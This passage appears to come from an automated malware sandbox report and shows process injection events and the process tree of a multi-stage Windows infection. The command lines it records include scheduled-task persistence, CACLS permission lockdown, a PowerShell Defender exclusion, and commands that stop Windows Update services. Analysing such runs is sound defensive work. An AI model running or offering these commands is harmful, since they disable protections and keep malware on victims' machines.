N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3468 wrote to memory of 4272 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe
PID 3468 wrote to memory of 4272 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe
PID 3468 wrote to memory of 4272 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe
PID 4272 wrote to memory of 3156 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe
PID 4272 wrote to memory of 3156 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe
PID 4272 wrote to memory of 3156 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe
PID 3156 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3156 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3156 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3156 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3156 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3156 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4272 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4272 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4272 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4388 wrote to memory of 1628 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4388 wrote to memory of 1628 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4388 wrote to memory of 1628 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4388 wrote to memory of 1628 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4388 wrote to memory of 1628 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4388 wrote to memory of 1628 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4388 wrote to memory of 1628 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4388 wrote to memory of 1628 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4388 wrote to memory of 1628 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4388 wrote to memory of 1628 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3468 wrote to memory of 3020 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 3468 wrote to memory of 3020 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 3468 wrote to memory of 3020 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 2624 wrote to memory of 904 N/A N/A C:\Users\Admin\AppData\Local\Temp\436D.exe
PID 2624 wrote to memory of 904 N/A N/A C:\Users\Admin\AppData\Local\Temp\436D.exe
PID 2624 wrote to memory of 904 N/A N/A C:\Users\Admin\AppData\Local\Temp\436D.exe
PID 904 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Local\Temp\436D.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WS5OY2lM.exe
PID 904 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Local\Temp\436D.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WS5OY2lM.exe
PID 904 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Local\Temp\436D.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WS5OY2lM.exe
PID 2624 wrote to memory of 856 N/A N/A C:\Users\Admin\AppData\Local\Temp\44B6.exe
PID 2624 wrote to memory of 856 N/A N/A C:\Users\Admin\AppData\Local\Temp\44B6.exe
PID 2624 wrote to memory of 856 N/A N/A C:\Users\Admin\AppData\Local\Temp\44B6.exe
PID 4684 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WS5OY2lM.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bB1Ol2hS.exe
PID 4684 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WS5OY2lM.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bB1Ol2hS.exe
PID 4684 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WS5OY2lM.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bB1Ol2hS.exe
PID 2624 wrote to memory of 2212 N/A N/A C:\Users\Admin\AppData\Local\Temp\4563.bat
PID 2624 wrote to memory of 2212 N/A N/A C:\Users\Admin\AppData\Local\Temp\4563.bat
PID 2624 wrote to memory of 2212 N/A N/A C:\Users\Admin\AppData\Local\Temp\4563.bat
PID 4860 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bB1Ol2hS.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\em6sS5Wk.exe
PID 4860 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bB1Ol2hS.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\em6sS5Wk.exe
PID 4860 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bB1Ol2hS.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\em6sS5Wk.exe
PID 2624 wrote to memory of 1476 N/A N/A C:\Users\Admin\AppData\Local\Temp\4777.exe
PID 2624 wrote to memory of 1476 N/A N/A C:\Users\Admin\AppData\Local\Temp\4777.exe
PID 2624 wrote to memory of 1476 N/A N/A C:\Users\Admin\AppData\Local\Temp\4777.exe
PID 540 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\em6sS5Wk.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\FY0Vk8iU.exe
PID 540 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\em6sS5Wk.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\FY0Vk8iU.exe
PID 540 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\em6sS5Wk.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\FY0Vk8iU.exe
PID 856 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\44B6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 856 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\44B6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 856 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\44B6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 856 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\44B6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 856 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\44B6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 856 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\44B6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 856 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\44B6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 856 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\44B6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 856 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\44B6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 856 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\44B6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2624 wrote to memory of 4644 N/A N/A C:\Users\Admin\AppData\Local\Temp\4824.exe
PID 2624 wrote to memory of 4644 N/A N/A C:\Users\Admin\AppData\Local\Temp\4824.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3156 -ip 3156

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 584

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5143384.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5143384.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4388 -ip 4388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 584

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1628 -s 540

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1628 -ip 1628

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c0453981.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c0453981.exe

C:\Users\Admin\AppData\Local\Temp\436D.exe

C:\Users\Admin\AppData\Local\Temp\436D.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WS5OY2lM.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WS5OY2lM.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bB1Ol2hS.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bB1Ol2hS.exe

C:\Users\Admin\AppData\Local\Temp\44B6.exe

C:\Users\Admin\AppData\Local\Temp\44B6.exe

C:\Users\Admin\AppData\Local\Temp\4563.bat

"C:\Users\Admin\AppData\Local\Temp\4563.bat"

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\em6sS5Wk.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\em6sS5Wk.exe

C:\Users\Admin\AppData\Local\Temp\4777.exe

C:\Users\Admin\AppData\Local\Temp\4777.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\FY0Vk8iU.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\FY0Vk8iU.exe

C:\Users\Admin\AppData\Local\Temp\4824.exe

C:\Users\Admin\AppData\Local\Temp\4824.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 856 -ip 856

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 388

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\463B.tmp\463C.tmp\463D.bat C:\Users\Admin\AppData\Local\Temp\4563.bat"

C:\Users\Admin\AppData\Local\Temp\4AD4.exe

C:\Users\Admin\AppData\Local\Temp\4AD4.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1ZO32QK3.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1ZO32QK3.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4388 -ip 4388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2668 -ip 2668

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 600

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 540

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2kf426Vj.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2kf426Vj.exe

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa26e946f8,0x7ffa26e94708,0x7ffa26e94718

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa26e946f8,0x7ffa26e94708,0x7ffa26e94718

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,12968447658721337842,5436463566782174213,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,3338189018443022165,8047999338253262420,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,3338189018443022165,8047999338253262420,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,12968447658721337842,5436463566782174213,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,12968447658721337842,5436463566782174213,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2628 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12968447658721337842,5436463566782174213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3684 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12968447658721337842,5436463566782174213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3664 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12968447658721337842,5436463566782174213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2832 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\86D5.exe

C:\Users\Admin\AppData\Local\Temp\86D5.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12968447658721337842,5436463566782174213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\B836.exe

C:\Users\Admin\AppData\Local\Temp\B836.exe

C:\Users\Admin\AppData\Local\Temp\B9AE.exe

C:\Users\Admin\AppData\Local\Temp\B9AE.exe

C:\Users\Admin\AppData\Local\Temp\BBC3.exe

C:\Users\Admin\AppData\Local\Temp\BBC3.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12968447658721337842,5436463566782174213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12968447658721337842,5436463566782174213,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6008 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12968447658721337842,5436463566782174213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5956 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,12968447658721337842,5436463566782174213,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5520 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,12968447658721337842,5436463566782174213,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5520 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12968447658721337842,5436463566782174213,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

